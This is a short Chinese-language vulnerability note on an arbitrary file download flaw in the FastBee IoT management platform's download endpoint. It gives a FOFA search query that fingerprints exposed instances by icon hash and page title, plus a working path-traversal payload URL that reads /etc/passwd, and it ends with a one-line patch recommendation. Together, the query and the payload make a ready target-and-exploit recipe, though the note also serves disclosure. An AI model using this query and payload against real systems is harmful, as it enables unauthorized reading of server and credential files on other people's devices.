fastbee物联网管理系统download接口任意文件下载漏洞
免责申明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
搜索语法
fofa
icon_hash="-307138793" && title=="FastBee物联网系统"
漏洞描述
FastBee是一个开源物联网平台,旨在简化物联网设备的连接与管理。它提供了灵活的架构和丰富的API,支持多种通信协议,使开发者能够快速构建和部署物联网应用。
在download接口中可以读取任意文件并下载
漏洞复现
payload
http://ip/prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd
修复建议
官方已经发布补丁,更新到最新版本